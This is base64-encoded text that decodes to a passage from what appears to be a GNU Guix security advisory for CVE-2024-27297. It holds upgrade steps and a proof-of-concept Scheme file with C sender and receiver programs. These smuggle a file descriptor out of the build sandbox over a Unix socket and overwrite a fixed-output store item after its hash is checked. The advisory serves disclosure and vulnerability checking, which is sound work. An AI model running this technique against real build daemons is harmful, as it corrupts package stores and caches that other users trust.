YGBzaApzdWRvIC0tbG9naW4gZ3VpeCBwdWxsCnN1ZG8gc3lzdGVtY3RsIHJlc3RhcnQgZ3VpeC1k YWVtb24uc2VydmljZQpgYGAKCk5vdGUgdGhhdCBmb3IgdXNlcnMgd2l0aCB0aGVpciBkaXN0cm8n cyBwYWNrYWdlIG9mIEd1aXggKGFzIG9wcG9zZWQgdG8KaGF2aW5nIHVzZWQgdGhlIFtpbnN0YWxs CnNjcmlwdF0oaHR0cHM6Ly9ndWl4LmdudS5vcmcvZW4vbWFudWFsL2RldmVsL2VuL2h0bWxfbm9k ZS9CaW5hcnktSW5zdGFsbGF0aW9uLmh0bWwpKQp5b3UgbWF5IG5lZWQgdG8gdGFrZSBvdGhlciBz dGVwcyBvciB1cGdyYWRlIHRoZSBHdWl4IHBhY2thZ2UgYXMgcGVyCm90aGVyIHBhY2thZ2VzIG9u IHlvdXIgZGlzdHJvLiBQbGVhc2UgY29uc3VsdCB0aGUgcmVsZXZhbnQKZG9jdW1lbnRhdGlvbiBm cm9tIHlvdXIgZGlzdHJvIG9yIGNvbnRhY3QgdGhlIHBhY2thZ2UgbWFpbnRhaW5lciBmb3IKYWRk aXRpb25hbCBpbmZvcm1hdGlvbiBvciBxdWVzdGlvbnMuCgojIENvbmNsdXNpb24KCk9uZSBvZiB0 aGUga2V5IGZlYXR1cmVzIGFuZCBkZXNpZ24gcHJpbmNpcGxlcyBvZiBHTlUgR3VpeCBpcyB0byBh bGxvdwp1bnByaXZpbGVnZWQgcGFja2FnZSBtYW5hZ2VtZW50IHRocm91Z2ggYSBzZWN1cmUgYW5k IHJlcHJvZHVjaWJsZQpbYnVpbGQKZW52aXJvbm1lbnRdKGh0dHBzOi8vZ3VpeC5nbnUub3JnL2Vu L21hbnVhbC9kZXZlbC9lbi9odG1sX25vZGUvQnVpbGQtRW52aXJvbm1lbnQtU2V0dXAuaHRtbCku CldoaWxlIGV2ZXJ5IGVmZm9ydCBpcyBtYWRlIHRvIHByb3RlY3QgdGhlIHVzZXIgYW5kIHN5c3Rl bSBmcm9tIGFueQptYWxpY2lvdXMgYWN0b3JzLCBpdCBpcyBhbHdheXMgcG9zc2libGUgdGhhdCB0 aGVyZSBhcmUgZmxhd3MgeWV0IHRvIGJlCmRpc2NvdmVyZWQsIGFzIGhhcyBoYXBwZW5lZCBoZXJl LiBJbiB0aGlzIGNhc2UsIHVzaW5nIHRoZSBpbmdyZWRpZW50cwpvZiBob3cgZmlsZSBkZXNjcmlw dG9ycyBhbmQgVW5peCBzb2NrZXRzIHdvcmsgZXZlbiBpbiB0aGUgaXNvbGF0ZWQKYnVpbGQgZW52 aXJvbm1lbnQgYWxsb3dlZCBmb3IgYSBzZWN1cml0eSB2dWxuZXJhYmlsaXR5IHdpdGggbW9kZXJh dGUKaW1wYWN0LgoKT3VyIHRoYW5rcyB0byBqYWRlIGFuZCBwdWNraXBlZGlhIGZvciB0aGUgb3Jp Z2luYWwgcmVwb3J0LCBhbmQgUGljbm9pcgpmb3IgYnJpbmdpbmcgdGhpcyB0byB0aGUgYXR0ZW50 aW9uIG9mIHRoZSBHTlUgR3VpeCBbc2VjdXJpdHkKdGVhbV0oaHR0cHM6Ly9ndWl4LmdudS5vcmcv ZW4vc2VjdXJpdHkvKS4gQW5kIGEgc3BlY2lhbCB0aGFua3MgdG8KTHVkb3ZpYyBDb3VydMOocyBm b3IgYSBwcm9tcHQgZml4IGFuZCBwcm9vZiBvZiBjb25jZXB0LgoKTm90ZSB0aGF0IHRoZXJlIGFy ZSBjdXJyZW50IGVmZm9ydHMgdG8gcmV3cml0ZSB0aGUgYGd1aXgtZGFlbW9uYCBpbgpHdWlsZSBi eSBDaHJpc3RvcGhlciBCYWluZXMuIEZvciBtb3JlIGluZm9ybWF0aW9uIGFuZCB0aGUgbGF0ZXN0 IG5ld3MKb24gdGhpcyBmcm9udCwgcGxlYXNlIHJlZmVyIHRvIHRoZSBbcmVjZW50IGJsb2cKcG9z dF0oaHR0cHM6Ly9ndWl4LmdudS5vcmcvZW4vYmxvZy8yMDIzL2EtYnVpbGQtZGFlbW9uLWluLWd1 aWxlLykgYW5kClt0aGlzCm1lc3NhZ2VdKGh0dHBzOi8vbGlzdHMuZ251Lm9yZy9hcmNoaXZlL2h0 bWwvZ3VpeC1kZXZlbC8yMDI0LTAyL21zZzAwMjUzLmh0bWwpCm9uIHRoZSBbZ3VpeC1kZXZlbF0o aHR0cHM6Ly9saXN0cy5nbnUub3JnL21haWxtYW4vbGlzdGluZm8vZ3VpeC1kZXZlbCkKbWFpbGlu ZyBsaXN0LgoKIyMgUHJvb2Ygb2YgQ29uY2VwdAoKQmVsb3cgaXMgY29kZSB0byBjaGVjayBpZiBh IGBndWl4LWRhZW1vbmAgaXMgdnVsbmVyYWJsZSB0byB0aGlzCmV4cGxvaXQuIFNhdmUgdGhpcyBm aWxlIGFzIGBmaXhlZC1vdXRwdXQtZGVyaXZhdGlvbi1jb3JydXB0aW9uLnNjbWAKYW5kIHJ1biBm b2xsb3dpbmcgdGhlIGluc3RydWN0aW9ucyBhYm92ZSwgaW4gIk1pdGlnYXRpb24uIiBTb21lCmZ1 cnRoZXIgZGV0YWlscyBhbmQgZXhhbXBsZSBvdXRwdXQgY2FuIGJlIGZvdW5kIG9uIFtpc3N1ZQoj Njk3MjhdKGh0dHBzOi8vaXNzdWVzLmd1aXguZ251Lm9yZy82OTcyOCM1KQoKYGBgc2NoZW1lCjs7 IENoZWNraW5nIGZvciBDVkUtMjAyNC0yNzI5Ny4KOzsgQWRhcHRlZCBmcm9tIDxodHRwczovL2hh Y2ttZC5pby8wM1VHZXJld1JjeTNkYjQ0SlFvV3Z3Pi4KCih1c2UtbW9kdWxlcyAoZ3VpeCkKICAg ICAgICAgICAgIChndWl4IG1vZHVsZXMpCiAgICAgICAgICAgICAoZ3VpeCBwcm9maWxlcykKICAg ICAgICAgICAgIChnbnUgcGFja2FnZXMpCiAgICAgICAgICAgICAoZ251IHBhY2thZ2VzIGdudXBn KQogICAgICAgICAgICAgKGdjcnlwdCBoYXNoKQogICAgICAgICAgICAgKChybnJzIGJ5dGV2ZWN0 b3JzKSAjOnNlbGVjdCAoc3RyaW5nLT51dGY4KSkpCgooZGVmaW5lIChjb21waWxlZC1jLWNvZGUg bmFtZSBzb3VyY2UpCiAgKGRlZmluZSBidWlsZC1wcm9maWxlCiAgICAocHJvZmlsZSAoY29udGVu dCAoc3BlY2lmaWNhdGlvbnMtPm1hbmlmZXN0ICcoImdjYy10b29sY2hhaW4iKSkpKSkKCiAgKGRl ZmluZSBidWlsZAogICAgKHdpdGgtZXh0ZW5zaW9ucyAobGlzdCBndWlsZS1nY3J5cHQpCiAgICAg KHdpdGgtaW1wb3J0ZWQtbW9kdWxlcyAoc291cmNlLW1vZHVsZS1jbG9zdXJlICcoKGd1aXggYnVp bGQgdXRpbHMpCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgKGd1aXggcHJvZmlsZXMpKSkKICAgICAgICN+KGJlZ2luCiAgICAgICAgICAgKHVzZS1t b2R1bGVzIChndWl4IGJ1aWxkIHV0aWxzKQogICAgICAgICAgICAgICAgICAgICAgICAoZ3VpeCBw cm9maWxlcykpCiAgICAgICAgICAgKGxvYWQtcHJvZmlsZSAjK2J1aWxkLXByb2ZpbGUpCiAgICAg ICAgICAgKHN5c3RlbSogImdjYyIgIi1XYWxsIiAiLWciICItTzIiICMrc291cmNlICItbyIgIyRv dXRwdXQpKSkpKQoKICAoY29tcHV0ZWQtZmlsZSBuYW1lIGJ1aWxkKSkKCihkZWZpbmUgc2VuZGVy LXNvdXJjZQogIChwbGFpbi1maWxlICJzZW5kZXIuYyIgIgogICAgICAjaW5jbHVkZSA8c3lzL3Nv Y2tldC5oPgogICAgICAjaW5jbHVkZSA8c3lzL3VuLmg+CiAgICAgICNpbmNsdWRlIDxzdGRsaWIu aD4KICAgICAgI2luY2x1ZGUgPHN0ZGRlZi5oPgogICAgICAjaW5jbHVkZSA8c3RkaW8uaD4KICAg ICAgI2luY2x1ZGUgPHVuaXN0ZC5oPgogICAgICAjaW5jbHVkZSA8ZmNudGwuaD4KICAgICAgI2lu Y2x1ZGUgPGVycm5vLmg+CgogICAgICBpbnQgbWFpbihpbnQgYXJnYywgY2hhciAqKmFyZ3YpIHsK ICAgICAgICAgIHNldHZidWYoc3Rkb3V0LCBOVUxMLCBfSU9MQkYsIDApOwoKICAgICAgICAgIGlu dCBzb2NrID0gc29ja2V0KEFGX1VOSVgsIFNPQ0tfU1RSRUFNLCAwKTsKCiAgICAgICAgICAvLyBT ZXQgdXAgYW4gYWJzdHJhY3QgZG9tYWluIHNvY2tldCBwYXRoIHRvIGNvbm5lY3QgdG8uCiAgICAg ICAgICBzdHJ1Y3Qgc29ja2FkZHJfdW4gZGF0YTsKICAgICAgICAgIGRhdGEuc3VuX2ZhbWlseSA9 IEFGX1VOSVg7CiAgICAgICAgICBkYXRhLnN1bl9wYXRoWzBdID0gMDsKICAgICAgICAgIHN0cmNw eShkYXRhLnN1bl9wYXRoICsgMSwgXCJkaWh1dGVub3NhXCIpOwoKICAgICAgICAgIC8vIE5vdyB0 cnkgdG8gY29ubmVjdCwgVG8gZW5zdXJlIHdlIHdvcmsgbm8gbWF0dGVyIHdoYXQgb3JkZXIgd2Ug YXJlCiAgICAgICAgICAvLyBleGVjdXRlZCBpbiwganVzdCBidXN5bG9vcCBoZXJlLgogICAgICAg ICAgaW50IHJlcyA9IC0xOwogICAgICAgICAgd2hpbGUgKHJlcyA8IDApIHsKICAgICAgICAgICAg ICBwcmludGYoXCJhdHRlbXB0aW5nIGNvbm5lY3Rpb24uLi5cXG5cIik7CiAgICAgICAgICAgICAg cmVzID0gY29ubmVjdChzb2NrLCAoY29uc3Qgc3RydWN0IHNvY2thZGRyICopJmRhdGEsCiAgICAg ICAgICAgICAgICAgIG9mZnNldG9mKHN0cnVjdCBzb2NrYWRkcl91biwgc3VuX3BhdGgpCiAgICAg ICAgICAgICAgICAgICAgKyBzdHJsZW4oXCJkaWh1dGVub3NhXCIpCiAgICAgICAgICAgICAgICAg ICAgKyAxKTsKICAgICAgICAgICAgICBpZiAocmVzIDwgMCAmJiBlcnJubyAhPSBFQ09OTlJFRlVT RUQpIHBlcnJvcihcImNvbm5lY3RcIik7CiAgICAgICAgICAgICAgaWYgKGVycm5vICE9IEVDT05O UkVGVVNFRCkgYnJlYWs7CiAgICAgICAgICAgICAgdXNsZWVwKDUwMDAwMCk7CiAgICAgICAgICB9 CgogICAgICAgICAgLy8gV3JpdGUgb3VyIG1lc3NhZ2UgaGVhZGVyLgogICAgICAgICAgc3RydWN0 IG1zZ2hkciBtc2cgPSB7MH07CiAgICAgICAgICBtc2cubXNnX2NvbnRyb2wgPSBtYWxsb2MoMTI4 KTsKICAgICAgICAgIG1zZy5tc2dfY29udHJvbGxlbiA9IDEyODsKCiAgICAgICAgICAvLyBXcml0 ZSBhbiBTQ01fUklHSFRTIG1lc3NhZ2UgY29udGFpbmluZyB0aGUgb3V0cHV0IHBhdGguCiAgICAg ICAgICBzdHJ1Y3QgY21zZ2hkciAqaGRyID0gQ01TR19GSVJTVEhEUigmbXNnKTsKICAgICAgICAg IGhkci0+Y21zZ19sZW4gPSBDTVNHX0xFTihzaXplb2YoaW50KSk7CiAgICAgICAgICBoZHItPmNt c2dfbGV2ZWwgPSBTT0xfU09DS0VUOwogICAgICAgICAgaGRyLT5jbXNnX3R5cGUgPSBTQ01fUklH SFRTOwogICAgICAgICAgaW50IGZkID0gb3BlbihnZXRlbnYoXCJvdXRcIiksIE9fUkRXUiB8IE9f Q1JFQVQsIDA2NDApOwogICAgICAgICAgbWVtY3B5KENNU0dfREFUQShoZHIpLCAodm9pZCAqKSZm ZCwgc2l6ZW9mKGludCkpOwoKICAgICAgICAgIG1zZy5tc2dfY29udHJvbGxlbiA9IENNU0dfU1BB Q0Uoc2l6ZW9mKGludCkpOwoKICAgICAgICAgIC8vIFdyaXRlIGEgc2luZ2xlIG51bGwgYnl0ZSB0 b28uCiAgICAgICAgICBtc2cubXNnX2lvdiA9IG1hbGxvYyhzaXplb2Yoc3RydWN0IGlvdmVjKSk7 CiAgICAgICAgICBtc2cubXNnX2lvdlswXS5pb3ZfYmFzZSA9IFwiXCI7CiAgICAgICAgICBtc2cu bXNnX2lvdlswXS5pb3ZfbGVuID0gMTsKICAgICAgICAgIG1zZy5tc2dfaW92bGVuID0gMTsKCiAg ICAgICAgICAvLyBTZW5kIGl0IHRvIHRoZSBvdGhoZXIgc2lkZSBvZiB0aGlzIGNvbm5lY3Rpb24u CiAgICAgICAgICByZXMgPSBzZW5kbXNnKHNvY2ssICZtc2csIDApOwogICAgICAgICAgaWYgKHJl cyA8IDApIHBlcnJvcihcInNlbmRtc2dcIik7CiAgICAgICAgICBpbnQgYnVmOwoKICAgICAgICAg IC8vIFdhaXQgZm9yIHRoZSBzZXJ2ZXIgdG8gY2xvc2UgdGhlIHNvY2tldCwgaW1wbHlpbmcgdGhh dCBpdCBoYXMKICAgICAgICAgIC8vIHJlY2VpdmVkIHRoZSBjb21tbWFuZC4KICAgICAgICAgIHJl Y3Yoc29jaywgKHZvaWQgKikmYnVmLCBzaXplb2YoaW50KSwgMCk7CiAgICAgIH0iKSkKCihkZWZp bmUgcmVjZWl2ZXItc291cmNlCiAgKG1peGVkLXRleHQtZmlsZSAicmVjZWl2ZXIuYyIgIgogICAg ICAjaW5jbHVkZSA8c3lzL3NvY2tldC5oPgogICAgICAjaW5jbHVkZSA8c3lzL3VuLmg+CiAgICAg ICNpbmNsdWRlIDxzdGRsaWIuaD4KICAgICAgI2luY2x1ZGUgPHN0ZGRlZi5oPgogICAgICAjaW5j bHVkZSA8c3RkaW8uaD4KICAgICAgI2luY2x1ZGUgPHVuaXN0ZC5oPgogICAgICAjaW5jbHVkZSA8 c3lzL2lub3RpZnkuaD4KCiAgICAgIGludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgewog ICAgICAgICAgaW50IHNvY2sgPSBzb2NrZXQoQUZfVU5JWCwgU09DS19TVFJFQU0sIDApOwoKICAg ICAgICAgIC8vIEJpbmQgdG8gdGhlIHNvY2tldC4KICAgICAgICAgIHN0cnVjdCBzb2NrYWRkcl91 biBkYXRhOwogICAgICAgICAgZGF0YS5zdW5fZmFtaWx5ID0gQUZfVU5JWDsKICAgICAgICAgIGRh dGEuc3VuX3BhdGhbMF0gPSAwOwogICAgICAgICAgc3RyY3B5KGRhdGEuc3VuX3BhdGggKyAxLCBc ImRpaHV0ZW5vc2FcIik7CiAgICAgICAgICBpbnQgcmVzID0gYmluZChzb2NrLCAoY29uc3Qgc3Ry dWN0IHNvY2thZGRyICopJmRhdGEsCiAgICAgICAgICAgICAgb2Zmc2V0b2Yoc3RydWN0IHNvY2th ZGRyX3VuLCBzdW5fcGF0aCkKICAgICAgICAgICAgICArIHN0cmxlbihcImRpaHV0ZW5vc2FcIikK ICAgICAgICAgICAgICArIDEpOwogICAgICAgICAgaWYgKHJlcyA8IDApIHBlcnJvcihcImJpbmRc Iik7CgogICAgICAgICAgcmVzID0gbGlzdGVuKHNvY2ssIDEpOwogICAgICAgICAgaWYgKHJlcyA8 IDApIHBlcnJvcihcImxpc3RlblwiKTsKCiAgICAgICAgICB3aGlsZSAoMSkgewogICAgICAgICAg ICAgIHNldHZidWYoc3Rkb3V0LCBOVUxMLCBfSU9MQkYsIDApOwogICAgICAgICAgICAgIHByaW50 ZihcImFjY2VwdGluZyBjb25uZWN0aW9ucy4uLlxcblwiKTsKICAgICAgICAgICAgICBpbnQgYSA9 IGFjY2VwdChzb2NrLCAwLCAwKTsKICAgICAgICAgICAgICBpZiAoYSA8IDApIHBlcnJvcihcImFj Y2VwdFwiKTsKCiAgICAgICAgICAgICAgc3RydWN0IG1zZ2hkciBtc2cgPSB7MH07CiAgICAgICAg ICAgICAgbXNnLm1zZ19jb250cm9sID0gbWFsbG9jKDEyOCk7CiAgICAgICAgICAgICAgbXNnLm1z Z19jb250cm9sbGVuID0gMTI4OwoKICAgICAgICAgICAgICAvLyBSZWNlaXZlIHRoZSBmaWxlIGRl c2NyaXB0b3IgYXMgc2VudCBieSB0aGUgc211Z2dsZXIuCiAgICAgICAgICAgICAgcmVjdm1zZyhh LCAmbXNnLCAwKTsKCiAgICAgICAgICAgICAgc3RydWN0IGNtc2doZHIgKmhkciA9IENNU0dfRklS U1RIRFIoJm1zZyk7CiAgICAgICAgICAgICAgd2hpbGUgKGhkcikgewogICAgICAgICAgICAgICAg ICBpZiAoaGRyLT5jbXNnX2xldmVsID09IFNPTF9TT0NLRVQKICAgICAgICAgICAgICAgICAgICYm IGhkci0+Y21zZ190eXBlID09IFNDTV9SSUdIVFMpIHsKICAgICAgICAgICAgICAgICAgICAgIGlu dCByZXM7CgogICAgICAgICAgICAgICAgICAgICAgLy8gR3JhYiB0aGUgY29weSBvZiB0aGUgZmls ZSBkZXNjcmlwdG9yLgogICAgICAgICAgICAgICAgICAgICAgbWVtY3B5KCh2b2lkICopJnJlcywg Q01TR19EQVRBKGhkciksIHNpemVvZihpbnQpKTsKICAgICAgICAgICAgICAgICAgICAgIHByaW50 ZihcInByZXBhcmluZyBvdXIgaGFuZC4uLlxcblwiKTsKCiAgICAgICAgICAgICAgICAgICAgICBm dHJ1bmNhdGUocmVzLCAwKTsKICAgICAgICAgICAgICAgICAgICAgIC8vIFdyaXRlIHRoZSBleHBl Y3RlZCBjb250ZW50cyB0byB0aGUgZmlsZSwgdHJpY2tpbmcgTml4CiAgICAgICAgICAgICAgICAg ICAgICAvLyBpbnRvIGFjY2VwdGluZyBpdCBhcyBtYXRjaGluZyB0aGUgZml4ZWQtb3V0cHV0IGhh c2guCiAgICAgICAgICAgICAgICAgICAgICB3cml0ZShyZXMsIFwiaGVsbG8sIHdvcmxkXFxuXCIs IHN0cmxlbihcImhlbGxvLCB3b3JsZFxcblwiKSk7CgogICAgICAgICAgICAgICAgICAgICAgLy8g QnV0IHdhaXQsIHRoZSBmaWxlIGlzIGJpZ2dlciB0aGFuIHRoaXMhIFdoYXQgY291bGQKICAgICAg ICAgICAgICAgICAgICAgIC8vIHRoaXMgY29kZSBoaWRlPwoKICAgICAgICAgICAgICAgICAgICAg IC8vIEZpcnN0LCB3ZSBkbyBhIGJpdCBvZiBhIGhhY2sgdG8gZ2V0IGEgcGF0aCBmb3IgdGhlCiAg ICAgICAgICAgICAgICAgICAgICAvLyBmaWxlIGRlc2NyaXB0b3Igd2UgcmVjZWl2ZWQuIFRoaXMg aXMgbmVjZXNzYXJ5IGJlY2F1c2UKICAgICAgICAgICAgICAgICAgICAgIC8vIHRoYXQgZmlsZSBk b2Vzbid0IGV4aXN0IGluIG91ciBtb3VudCBuYW1lc3BhY2UhCiAgICAgICAgICAgICAgICAgICAg ICBjaGFyIGJ1ZlsxMjhdOwogICAgICAgICAgICAgICAgICAgICAgc3ByaW50ZihidWYsIFwiL3By b2Mvc2VsZi9mZC8lZFwiLCByZXMpOwoKICAgICAgICAgICAgICAgICAgICAgIC8vIEhvb2sgdXAg YW4gaW5vdGlmeSBvbiB0aGF0IGZpbGUsIHNvIHdoZW5ldmVyIE5peAogICAgICAgICAgICAgICAg ICAgICAgLy8gY2xvc2VzIHRoZSBmaWxlLCB3ZSBnZXQgbm90aWZpZWQuCiAgICAgICAgICAgICAg ICAgICAgICBpbnQgaW5vdCA9IGlub3RpZnlfaW5pdCgpOwogICAgICAgICAgICAgICAgICAgICAg aW5vdGlmeV9hZGRfd2F0Y2goaW5vdCwgYnVmLCBJTl9DTE9TRV9OT1dSSVRFKTsKCiAgICAgICAg ICAgICAgICAgICAgICAvLyBOb3RpZnkgdGhlIHNtdWdnbGVyIHRoYXQgd2UndmUgc2V0IGV2ZXJ5 dGhpbmcgdXAgZm9yCiAgICAgICAgICAgICAgICAgICAgICAvLyB0aGUgbWFnaWMgdHJpY2sgd2Un cmUgYWJvdXQgdG8gZG8uCiAgICAgICAgICAgICAgICAgICAgICBjbG9zZShhKTsKCiAgICAgICAg ICAgICAgICAgICAgICAvLyBTbywgYmVmb3JlIHdlIGNvbnRpbnVlIHdpdGggdGhpcyBjb2RlLCBh IHRyaXAgaW50byBOaXgKICAgICAgICAgICAgICAgICAgICAgIC8vIHJldmVhbHMgYSBzbWFsbCBm bGF3IGluIGZpeGVkLW91dHB1dCBkZXJpdmF0aW9ucy4gV2hlbgogICAgICAgICAgICAgICAgICAg ICAgLy8gc3RvcmluZyB0aGVpciBvdXRwdXQsIE5peCBoYXMgdG8gaGFzaCB0aGVtIHR3aWNlLiBP bmNlCiAgICAgICAgICAgICAgICAgICAgICAvLyB0byB2ZXJpZnkgdGhleSBtYXRjaCB0aGUgXCJm bGF0XCIgaGFzaCBvZiB0aGUgZGVyaXZhdGlvbgogICAgICAgICAgICAgICAgICAgICAgLy8gYW5k IG9uY2UgbW9yZSBhZnRlciBwYWNraW5nIHRoZSBmaWxlIGludG8gdGhlIE5BUiB0aGF0CiAgICAg ICAgICAgICAgICAgICAgICAvLyBnZXRzIHNlbnQgdG8gYSBiaW5hcnkgY2FjaGUgZm9yIG90aGVy cyB0byBjb25zdW1lLiBBbmQKICAgICAgICAgICAgICAgICAgICAgIC8vIHRoZXJlJ3MgYSB2ZXJ5 IHNsaWdodCB3aW5kb3cgaW5iZXR3ZWVuLCB3aGVyZSB3ZSBjb3VsZAogICAgICAgICAgICAgICAg ICAgICAgLy8ganVzdCBzd2FwIHRoZSBjb250ZW50cyBvZiBvdXIgZmlsZS4gQnV0IHRoZSBmaXJz dCBoYXNoCiAgICAgICAgICAgICAgICAgICAgICAvLyBpcyBzdGlsbCBub3RlZCBkb3duLCBhbmQg Tml4IHdpbGwgcmVmdXNlIHRvIGltcG9ydCBvdXIKICAgICAgICAgICAgICAgICAgICAgIC8vIE5B UiBmaWxlLiBUbyB0cmljayBpdCwgd2UgbmVlZCB0byB3cml0ZSBhIHJlZmVyZW5jZSB0bwogICAg ICAgICAgICAgICAgICAgICAgLy8gYSBzdG9yZSBwYXRoIHRoYXQgdGhlIHNvdXJjZSBjb2RlIGZv ciB0aGUgc211Z2dsZXIgZHJ2CiAgICAgICAgICAgICAgICAgICAgICAvLyByZWZlcmVuY2VzLCB0 byBlbnN1cmUgaXQgZ2V0cyBwaWNrZWQgdXAuIENvbnRpbnVpbmcuLi4KCiAgICAgICAgICAgICAg ICAgICAgICAvLyBXYWl0IGZvciB0aGUgbmV4dCBpbm90aWZ5IGV2ZW50IHRvIGRyb3A6CiAgICAg ICAgICAgICAgICAgICAgICByZWFkKGlub3QsIGJ1ZiwgMTI4KTsKCiAgICAgICAgICAgICAgICAg ICAgICAvLyBmaXJzdCByZWFkICsgQ0EgY2hlY2sgaGFzIGp1c3QgYmVlbiBkb25lLCBOaXggaXMg YWJvdXQKICAgICAgICAgICAgICAgICAgICAgIC8vIHRvIGNob3duIHRoZSBmaWxlIHRvIHJvb3Qu IGFmdGVyd2FyZHMsIHJlZnNjYW5uaW5nCiAgICAgICAgICAgICAgICAgICAgICAvLyBoYXBwZW5z Li4uCgogICAgICAgICAgICAgICAgICAgICAgLy8gRW1wdHkgdGhlIGZpbGUsIHNlZWsgdG8gc3Rh cnQuCiAgICAgICAgICAgICAgICAgICAgICBmdHJ1bmNhdGUocmVzLCAwKTsKICAgICAgICAgICAg ICAgICAgICAgIGxzZWVrKHJlcywgMCwgU0VFS19TRVQpOwoKICAgICAgICAgICAgICAgICAgICAg IC8vIFdlIHN3YXAgb3V0IHRoZSBjb250ZW50cyEKICAgICAgICAgICAgICAgICAgICAgIHN0YXRp YyBjb25zdCBjaGFyIGNvbnRlbnRbXSA9IFwiVGhpcyBmaWxlIGhhcyBiZWVuIGNvcnJ1cHRlZCFc XG5cIjsKICAgICAgICAgICAgICAgICAgICAgIHdyaXRlKHJlcywgY29udGVudCwgc3RybGVuIChj b250ZW50KSk7CiAgICAgICAgICAgICAgICAgICAgICBjbG9zZShyZXMpOwoKICAgICAgICAgICAg ICAgICAgICAgIHByaW50ZihcInN3YXB0cmljayBmaW5pc2hlZCwgbm93IHRvIHdhaXQuLlxcblwi KTsKICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAwOwogICAgICAgICAgICAgICAgICB9Cgog ICAgICAgICAgICAgICAgICBoZHIgPSBDTVNHX05YVEhEUigmbXNnLCBoZHIpOwogICAgICAgICAg ICAgIH0KICAgICAgICAgICAgICBjbG9zZShhKTsKICAgICAgICAgIH0KICAgICAgfSIpKQoKKGRl ZmluZSBub25jZQogIChzdHJpbmctYXBwZW5kICItIiAobnVtYmVyLT5zdHJpbmcgKGNhciAoZ2V0 dGltZW9mZGF5KSkgMTYpCiAgICAgICAgICAgICAgICAgIi0iIChudW1iZXItPnN0cmluZyAoZ2V0 cGlkKSkpKQoKKGRlZmluZSBvcmlnaW5hbC10ZXh0CiAgIlRoaXMgaXMgdGhlIG9yaWdpbmFsIHRl eHQsIGJlZm9yZSBjb3JydXB0aW9uLiIpCgooZGVmaW5lIGRlcml2YXRpb24tdGhhdC1leGZpbHRy YXRlcy1mZAogIChjb21wdXRlZC1maWxlIChzdHJpbmctYXBwZW5kICJkZXJpdmF0aW9uLXRoYXQt ZXhmaWx0cmF0ZXMtZmQiIG5vbmNlKQogICAgICAgICAgICAgICAgICh3aXRoLWltcG9ydGVkLW1v ZHVsZXMgJygoZ3VpeCBidWlsZCB1dGlscykpCiAgICAgICAgICAgICAgICAgICAjfihiZWdpbgog ICAgICAgICAgICAgICAgICAgICAgICh1c2UtbW9kdWxlcyAoZ3VpeCBidWlsZCB1dGlscykpCiAg ICAgICAgICAgICAgICAgICAgICAgKGludm9rZSAjKyhjb21waWxlZC1jLWNvZGUgInNlbmRlciIg c2VuZGVyLXNvdXJjZSkpCiAgICAgICAgICAgICAgICAgICAgICAgKGNhbGwtd2l0aC1vdXRwdXQt ZmlsZSAjJG91dHB1dAogICAgICAgICAgICAgICAgICAgICAgICAgKGxhbWJkYSAocG9ydCkKICAg ICAgICAgICAgICAgICAgICAgICAgICAgKGRpc3BsYXkgIyRvcmlnaW5hbC10ZXh0IHBvcnQpKSkp KQogICAgICAgICAgICAgICAgICM6b3B0aW9ucyBgKCM6aGFzaC1hbGdvIHNoYTI1NgogICAgICAg ICAgICAgICAgICAgICAgICAgICAgICM6aGFzaCAsKHNoYTI1NgogICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIChzdHJpbmctPnV0Zjggb3JpZ2luYWwtdGV4dCkpKSkpCgooZGVm aW5lIGRlcml2YXRpb24tdGhhdC1ncmFicy1mZAogIChjb21wdXRlZC1maWxlIChzdHJpbmctYXBw ZW5kICJkZXJpdmF0aW9uLXRoYXQtZ3JhYnMtZmQiIG5vbmNlKQogICAgICAgICAgICAgICAgICN+ KGJlZ2luCiAgICAgICAgICAgICAgICAgICAgIChvcGVuLW91dHB1dC1maWxlICMkb3V0cHV0KSA7 bWFrZSBzdXJlIHRoZXJlJ3MgYW4gb3V0cHV0CiAgICAgICAgICAgICAgICAgICAgIChleGVjbCAj Kyhjb21waWxlZC1jLWNvZGUgInJlY2VpdmVyIiByZWNlaXZlci1zb3VyY2UpCiAgICAgICAgICAg ICAgICAgICAgICAgICAgICAicmVjZWl2ZXIiKSkKICAgICAgICAgICAgICAgICAjOm9wdGlvbnMg YCgjOmhhc2gtYWxnbyBzaGEyNTYKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjOmhhc2gg LChzaGEyNTYgI3Z1OCgpKSkpKQoKKGRlZmluZSBjaGVjawogIChjb21wdXRlZC1maWxlICJjaGVj a2luZy1mb3ItdnVsbmVyYWJpbGl0eSIKICAgICAgICAgICAgICAgICAjfihiZWdpbgogICAgICAg ICAgICAgICAgICAgICAodXNlLW1vZHVsZXMgKGljZS05IHRleHR1YWwtcG9ydHMpKQoKICAgICAg ICAgICAgICAgICAgICAgKG1rZGlyICMkb3V0cHV0KSAgICAgICAgICAgIDttYWtlIHN1cmUgdGhl cmUncyBhbiBvdXRwdXQKICAgICAgICAgICAgICAgICAgICAgKGZvcm1hdCAjdCAiVGhpcyBkZXBl bmRzIG9uIH5hLCB3aGljaCB3aWxsIGdyYWIgdGhlIGZpbGUKZGVzY3JpcHRvciBhbmQgY29ycnVw dCB+YS5+JX4lIgogICAgICAgICAgICAgICAgICAgICAgICAgICAgICMrZGVyaXZhdGlvbi10aGF0 LWdyYWJzLWZkCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIytkZXJpdmF0aW9uLXRoYXQt ZXhmaWx0cmF0ZXMtZmQpCgogICAgICAgICAgICAgICAgICAgICAobGV0ICgoY29udGVudCAoY2Fs bC13aXRoLWlucHV0LWZpbGUKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICMrZGVyaXZhdGlvbi10aGF0LWV4ZmlsdHJhdGVzLWZkCiAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgZ2V0LXN0cmluZy1hbGwpKSkKICAgICAgICAgICAgICAgICAgICAgICAo Zm9ybWF0ICN0ICJIZXJlIGlzIHdoYXQgd2Ugc2VlIGluIH5hOiB+c34lfiUiCiAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAjK2Rlcml2YXRpb24tdGhhdC1leGZpbHRyYXRlcy1mZCBjb250 ZW50KQogICAgICAgICAgICAgICAgICAgICAgIChpZiAoc3RyaW5nPT8gY29udGVudCAjJG9yaWdp bmFsLXRleHQpCiAgICAgICAgICAgICAgICAgICAgICAgICAgIChmb3JtYXQgI3QgIkZhaWxlZCB0 